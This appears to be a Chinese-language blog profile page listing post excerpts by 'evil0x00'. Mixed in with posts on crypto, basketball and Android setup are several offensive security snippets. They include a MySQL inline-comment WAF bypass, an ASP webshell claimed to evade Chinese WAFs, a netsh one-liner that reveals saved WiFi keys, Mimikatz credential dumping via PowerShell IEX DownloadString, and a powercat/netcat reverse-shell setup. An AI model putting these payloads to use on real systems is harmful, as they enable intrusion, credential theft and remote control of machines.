Login
Discover
Waves
Communities
Write
Login
Signup
evil0x00
@evil0x00
43
Followers
270
Following
21
Follow
Email digest
Resource Credits
Available
Used
Created
2017-12-28 20:19
RSS Feed
Subscribe
Blog
Blog
Posts
Comments
Communities
Wallet
evil0x00
cn-curation
8y
Windows 程序崩溃后恢复
Windows 程序崩溃后恢复 场景一: 你正在写文档崩溃了怎么办 文档要如何恢复呢? 下面就写这个恢复过程 0x01:使用工具 windbag win7 64位 安装使用的时候会缺少dll ,来这里下载这个更新就ok了 0x02 : 文档恢复 崩溃后会产生DMP文件,文件位置是在:C:\Users\ADMINI~1\AppData\Local\Temp*********.DMP 现在我们手工制造一个
$ 0.055
12
4
evil0x00
cn
8y
方案设计图
方案设计图 今天做了的的方案设计图,分享出来 献个丑, 哈哈
$ 0.022
4
7
evil0x00
cmd
8y
Windows-Exploit-Suggester
Windows-Exploit-Suggester 分享一个Windows工具 ,用来检测本机哪些补丁没有安装,来预防攻击 源码在这里 需要安装python环境 使用如下: $ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt [*] initiating...
evil0x00
cn-curation
8y
这是我见过最帅的共享汽车
关于共享汽车的一些想法 这样的共享特斯拉 感觉怎么样 ,瞬间有一种高大上的感觉, 今天在公司楼下没想到真的见到了 这种共享汽车,瞬间有种不一样的感觉: 这年头 买不起车 还开不起共享汽车么,我这样的屌丝的福利到了,开这车出去接妹纸出去玩,也有种牛逼的感觉,虽然车上有共享两个字 但是还是不影响的哈哈。
evil0x00
cn-curation
8y
Android 开发环境搭建
Android 开发环境搭建 由于被墙了 所以安装有点麻烦 但是也很简单只要你知道方法 如下: 先下载开发工具: 在这里下载android studio 很简单 困难的地方是安装sdk 官方给的下载SDK工具 是在这里下载 但是这个东西 我没搞懂 我用老的方法下载的 下载之后如下: 安装过之后 如果你不使用镜像的话 还是下载的非常慢的 在这里配置 配置如下就非常快了 等下载完就搞定了
evil0x00
cmd
8y
MYSQL内联注释绕过WAF
MYSQL内联注释绕过WAF 前言: 现在基本上是个网站都设置个waf ,一般都是通过一些注释啊 编码绕过 一些注释如下: //, -- , /**/, #, --+, -- -, ;%00 这些都需要自己收集 积累 不过这些大多都不能用 内联注释还是可以用的 id=1/*!UnIoN*/SeLeCT /*! code */来绕过
evil0x00
cn-curation
8y
分享一个查看本机连接WiFi的工具
获取本机连接WiFi记录 1.利用环境 a.windows b.无线网卡 代码如下: for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear 获取到的记录如下:
evil0x00
cmd
8y
Mimikatz Get Local Credentials
Mimikatz Get Local Credentials when you get shell,maybe you will need this! Mimikatz Get Local Credentials First: Show Credentials dir /a %userprofile%\AppData\Local\Microsoft\Credentials\* 2.Second: Get
evil0x00
cmd
8y
SQLMap tamper
space2comment 进行WAF绕过测试的时候 " " 转换成 "/**/" 但是 这个也会被注释 -- - 注释为 --/**/- 就会导致出错 那么可以更改脚本为: #!/usr/bin/env python """ Copyright (c) 2006-2018 sqlmap developers ( See the
evil0x00
cmd
8y
ASP webshell
ASP webshell 正文来了 asp 绕过waf <% <!--"--> execute request("LandGrey") %> 原理就是通过注释 绕过 D盾 以及 安全狗 亲测 现在可用
evil0x00
cn
8y
发现一篇良心文章 #EDU&BAI任意转走账户Token事件回顾
EDU&BAI任意转走账户Token事件回顾 文章地址:
evil0x00
cn
8y
关于USDT 虚假转账安全⻛险分析的看法
关于USDT 虚假转账安全⻛险分析的看法 0x01: 前言: 这两天出差 回来看到这个文章 原文链接 「慢雾区」公众号发布 0x02: 简单介绍 如果⼀笔 USDT 的交易合法的,要⾄少满⾜以下 2 个条件: 1.要通过⽐特币的交易来构造,要符合⽐特币的余额验证(BTC)及交易规则验证 2.要通过 USDT ⾃⼰的余额(USDT)验证 被 USDT 冻结的地址发起的交易也会被标记为⽆效交易。
evil0x00
cn
8y
狗子:你放开我好吗???
哈哈 没想到还有这种操作吧 狗子:你放开我好吗???
evil0x00
cn
8y
一入币圈深似海
一入币圈深似海 从此生死两茫茫啊
evil0x00
cmd
8y
Fiddler使用笔记
Fiddler使用笔记 0x01: 基本使用教程 Fiddler左下角的黑框是用来输入命令的地方。叫QuickExec 常用命令如下: help 打开官方的使用页面介绍,所有的命令都会列出来 cls 清屏 (Ctrl+x 也可以清屏) select 选择会话的命令 ?.png 用来选择png后缀的图片 bpu 截获request 输入断点的两种方法。 * 1. 打开Fiddler 点击Rules->
evil0x00
cmd
8y
Powershell调用mimikatz dump 密码
powershell调用mimikatz dump 密码 脚本地址: 国外大神clymb3r写的一个powershell脚本将mimikatz注入到内存调用logonPasswords获取密码,使用起来相当轻便。 powershell "IEX (New-Object Net.WebClient).DownloadString(' Invoke-Mimikatz -DumpCreds"
ethcoin
cmd
8y
evil0x00 reblogged
哈哈哈 这张图承包了我一年的笑点
内心OS如下: 饲养员: 兄dei 起来了 马: 别动我的小被几 马:站了这个对年没想到躺着这么舒服!
evil0x00
cmd
8y
这次比赛 骑士输了 詹姆斯赢了
这次比赛 骑士输了 詹姆斯赢了 今天这场比赛在第四场的时候 骑士队 有三个肯能性 去结束比赛 ,但是确因为JR的失误 导致了加时 输掉了比赛,身边的朋友,以及朋友圈都在骂JR 。 的确是JR的过错 ,不过试想就算是JR没有抢到这个篮板 ,也不会有人说什么,不会有这么多骂声。 这场比赛 詹姆士打出了王者风范,但是队友实在是带不动 现在开始怀念欧文 ,希望欧文能在下一场 赶紧回来加入比赛吧 勇士阵容真的是太强大了
evil0x00
cmd
8y
linux /etc/shadow破解方式一
shadow 格式 root:$1$9GBfNwzw$dRF4w0Rw1PzTc.20HLYbi/:17362:0:99999:7::: bin:*:17112:0:99999:7::: daemon:*:17112:0:99999:7::: adm:*:17112:0:99999:7::: lp:*:17112:0:99999:7::: sync:*:17112:0:99999:7:::
evil0x00
cmd
8y
powercat反弹shell
powercat反弹shell powercat就是powershell版的Netcat github如下: powercat github 如何使用 攻击者: nc -lvp 6666 或者使用powercat监听: powercat -l -p 6666 目标机反弹cmd shell: powershell IEX (New-Object System.Net.Webclient).DownloadString
← Latest
Older →